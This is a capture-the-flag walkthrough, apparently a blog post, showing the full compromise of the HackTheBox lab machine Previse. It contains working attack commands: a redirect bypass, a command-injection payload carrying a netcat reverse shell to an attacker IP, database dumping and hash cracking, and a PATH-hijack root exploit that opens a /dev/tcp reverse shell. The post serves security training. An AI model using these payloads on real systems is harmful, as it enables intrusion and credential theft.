Previse HackTheBox WalkThrough

This is the Previse HackTheBox machine walkthrough. In this writeup I demonstrate step by step how I rooted the Previse machine. Before starting, a few facts about the box: it is a Linux machine with IP address 10.10.11.104, and its maker rated it Easy.

First of all, connect your PC to the HackTheBox VPN and confirm connectivity with the Previse machine by pinging its IP 10.10.11.104. If all goes well, start hacking. As usual, I started by scanning the machine. Scanning gives us an idea of how to proceed: it grabs banners from the services running on the open ports and sometimes helps with vulnerability assessment as well. I used $ nmap [a popular port scanner] for this task and the result is given below: –

Scanning

$ sudo nmap -sC -sV -sT -p- -oN full-tcp-port.nmap 10.10.11.104
Nmap Scan result during Previse HackTheBox Walkthrough

The full TCP port scan with nmap revealed the open ports; we will focus on ports 22 and 80 since the services running on them are well known. OpenSSH 7.6p1 is listening on port 22 and an Apache2 web server on port 80. Since port 80 is open with a web server behind it, there must be a website hosted there, reachable at the URL http://10.10.11.104. We will begin our enumeration with port 80. Browsing to http://10.10.11.104 brought up a login page as shown below.

Previse Login Page

I simply tried some default credentials like admin : admin, admin : password, previse : password and a few more, but none of them worked. Then I tried some SQL injection login-bypass payloads, which also did not work. Fuzzing with malicious payloads to provoke a verbose error message got nothing either; everything seemed to be configured properly. If I could find a username from anywhere I would certainly brute-force this login page, since it has neither a captcha nor rate limiting. Meanwhile I started $ dirsearch in the background to find directories and files.

$ sudo dirsearch -u http://10.10.11.104/ -e all -x 402,401,403,404 -t 50
Directory bruteforce result during Previse HackTheBox Walkthrough

Dirsearch found many files, and most of them redirected me to the login page when accessed. When I tried to open accounts.php through the URL http://10.10.11.104/accounts.php it redirected me to login.php.

Forced Login into Previse

Then I went to the URL http://10.10.11.104/accounts.php, captured the request in Burp Suite and tried a forced login by changing the response to the request. The captured request for accounts.php is shown in the screenshot below.

Accounts.php request in BurpSuite captured during Previse HackTheBox Walkthrough

Right-click on the request and choose to intercept the response to this request. Then replace 302 Found with 200 OK so the browser does not follow the redirect to login.php, as shown in the screenshot given below. This trick only works because the server has already rendered the full page body into the 302 response: the access check sends the Location header but does not stop executing the script, so the protected content travels along with the redirect. You can confirm the same thing without Burp by fetching the page with curl and no -L flag, which prints the 302 response body instead of following the redirect.

Manipulated response of accounts.php request

After forwarding the modified response, the accounts page loads: we are in the application.

Logout page of previse machine during Previse HackTheBox Walkthrough

Once in, I tried to add a new account by registering a user. I entered the credentials test2 : test2, clicked the CREATE USER button, captured the request in Burp Suite again and modified the response as in the steps above.

Creating test2 user in previse htb machine

Now we have successfully registered a user account with the credential test2 : test2.

Created user in accounts.php page in previse htb walkthrough

Let us log in to the test2 account. After logging in I saw a file-upload feature, so I uploaded a simple txt file and checked whether it could be executed on the server. When I accessed it, it was immediately served as a download rather than rendered. Had it executed, my next step would have been to upload a PHP web shell and catch a reverse shell on my netcat listener, but that is of no use here.

There is a backup file present, named SITEBACKUP.ZIP. After downloading and extracting it I found the credentials root : mySQL_p@ssw0rd!:) in config.php. I tried to SSH in as root with this password, but it is not an SSH credential. I also tried the password with the other enumerated users like newguy, m4lwhere and admin, but none of them worked.

$ cat config.php
config-php file from SITEBACKUP.ZIP file captured during Previse HackTheBox Walkthrough

Reviewing the source code of all the files inside SITEBACKUP.ZIP, I found that logs.php calls the dangerous PHP function exec(). The function receives user input through the delim parameter without any input validation, and the value is concatenated straight into the command string. Using exec() on unvalidated input in this way leads to OS command injection. For more information about exec() see the PHP manual entry for the function.

After some testing I confirmed a blind OS command injection in this file (blind, because the command output is not returned in the response). Since the backup file was downloaded from this very website, there is a good chance the code running on the server is the same and therefore also vulnerable.

Confirming OS Command Injection

To confirm the blind OS command injection we will inject a command that makes the target reach back to us, such as $ ping against our own IP, through the delim parameter of the Previse logs.php page, and capture the ICMP echo requests with Wireshark or $ tcpdump on our Kali machine.

Testing OS command injection vulnerability in Previse HackTheBox Machine
$ sudo tcpdump -i tun0 icmp
Ping response captured in tcpdump on kali

We found that the Previse machine pings our Kali machine, so the blind OS command injection is confirmed using an out-of-band (ICMP callback) technique; a time-delay command such as sleep would work too if you compare response times. For more methods of exploiting OS command injection check the PortSwigger article on the topic. Let us get a user shell with a reverse-shell one-liner. I am using $ nc; you can use any other. You can find such one-liners in any reverse-shell cheat sheet.

Getting User Shell

To get a reverse shell, start a netcat listener on your Kali machine on port 9001 and put the following one-liner payload in the delim parameter (URL-encoded, since it travels in the POST body; note that the & in 2>&1 is sent as %26 so it does not terminate the parameter):

;rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.10.16.10+9001+>/tmp/f
Getting user shell in Previse HackTheBox Walkthrough
$ nc -nvlp 9001
$ whoami && id
Receiving the reverse connection on netcat listener in Kali machine during Previse HackTheBox Walkthrough

We have a reverse shell as www-data. Let us upgrade it to a fully interactive shell so that we can run more advanced commands through it (and use Ctrl-C without killing the connection).

Upgrading Shell

$ python3 -c 'import pty;pty.spawn("/bin/bash")'
$ ^Z # To background
$ stty raw -echo
$ fg # To put foreground
$ export TERM=xterm
Shell upgrade

Checking Listening Ports

After some enumeration I found port 3306 listening on localhost only. Port 3306 is the default port of the classic MySQL protocol, used by the MySQL client, MySQL Connectors and utilities such as mysqldump and mysqlpump. Because it is bound to localhost it did not show up in the nmap scan and can only be reached from the box itself.

$ ss -lnpt
Listening ports in Previse HackTheBox machine

We already have a database credential from config.php, so I used it to log in to the MySQL server with the $ mysql client.

$ mysql -u 'root' -p
~mySQL_p@ssw0rd!:)
mysql> show databases;
mysql> use previse;
mysql> show tables;
mysql> SELECT * FROM accounts;
mysql> exit
Dumping the database during Previse HackTheBox Walkthrough

From the accounts table we found the password hash of user m4lwhere.

m4lwhere : $1$🧂llol$DQpmdvnb7EeuO6UaqRItf.

Identify the Hash

Before cracking this hash we need to identify its type. The $1$ prefix marks it as md5crypt, also known as MD5 (Unix) or Cisco-IOS $1$ (MD5), which is hashcat mode 500; this can be confirmed against hashcat's example hashes:

$ hashcat --example-hashes | grep -A2 -i 'MODE: 500'
Hashcat result showing the type of hash

For cracking the hash I used $ hashcat (a well-known offline password cracker) with the wordlist rockyou.txt (rockyou.txt is already present on Kali and Parrot OS in the directory /usr/share/wordlists/).

Cracking Hash

$ cat hash.txt
$ hashcat -m 500 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
$ hashcat -m 500 -a 0 hash.txt /usr/share/wordlists/rockyou.txt --show
(-a 0 selects straight wordlist mode; -a 3 is mask mode and would not use the wordlist.)
Cracking hash using hashcat - 1

—–SNIP—–

Cracking hash using hashcat - 2

The cracked password for the user m4lwhere is ilovecody112235!.

Let us SSH into m4lwhere account

$ ssh m4lwhere@10.10.11.104
~ilovecody112235!
SSH into Previse HackTheBox into m4lwhere account

We are successfully logged in as m4lwhere. Let us capture user flag.

Capture User Flag

$ cat user.txt
User flag captured in Previse HackTheBox Walkthrough

Privilege Escalation

To escalate privileges to root we first have to find a privilege-escalation vector. We can find one either manually or with post-exploitation enumeration scripts like linpeas.sh, LinEnum.sh and many others. This time I went with manual enumeration.

Finding PrivEsc Vector

$ sudo -l revealed that user m4lwhere can run the script /opt/scripts/access_backup.sh as root.

$ sudo -l
~ilovecody112235!
Result of Sudo -l command during Previse HackTheBox Walkthrough

Looking at the content of access_backup.sh, I found that the $ gzip command is invoked by its bare name rather than an absolute path, so the script resolves it through the caller's PATH. That is a PATH hijacking vulnerability: whoever controls PATH controls which gzip runs as root. Two conditions make it exploitable here: the script is run through sudo, and sudo passes our PATH through (check the Defaults line printed by $ sudo -l; if it lists secure_path, sudo replaces PATH with that fixed value and this trick fails). For more info about privilege escalation via the PATH variable check this article.

$ cat /opt/scripts/access_backup.sh
access_backup.sh file of previse htb machine

When I tried to escalate privileges via the PATH variable, it worked straight away. So our privilege-escalation vector is PATH hijacking of the gzip call in a script run as root via sudo.

Getting Root Shell

To get the root shell I ran the following commands.

On Previse Machine

$ echo $PATH
$ echo '#!/bin/bash' > /tmp/gzip
$ echo 'bash -i >& /dev/tcp/10.10.17.97/9001 0>&1' >> /tmp/gzip
$ cat /tmp/gzip
$ chmod +x /tmp/gzip
$ export PATH=/tmp:$PATH
$ echo $PATH
$ sudo /opt/scripts/access_backup.sh

On Kali Machine

$ nc -nvlp 9001
# whoami && id
Privilege escalation during Previse HackTheBox Walkthrough

We are root now. Let us capture root flag.

Capture Root Flag

# cat /root/root.txt
Root flag captured during Previse HackTheBox Walkthrough

This was how I rooted the Previse HackTheBox machine. I learnt a lot from this challenge and hope you learnt something new too. Thanks for reading. For any query or suggestion about the walkthrough feel free to write to us at [email protected].


Deepak Kumar Maurya

Hi everyone, I am Deepak Kumar Maurya, creator of Ethicalhacs.com. I am an InfoSec consultant by day and a bug bounty hunter & CTF player by night. Sometimes I write walkthroughs and other cyber security articles here. You can connect with me at https://www.linkedin.com/in/deepakdkm/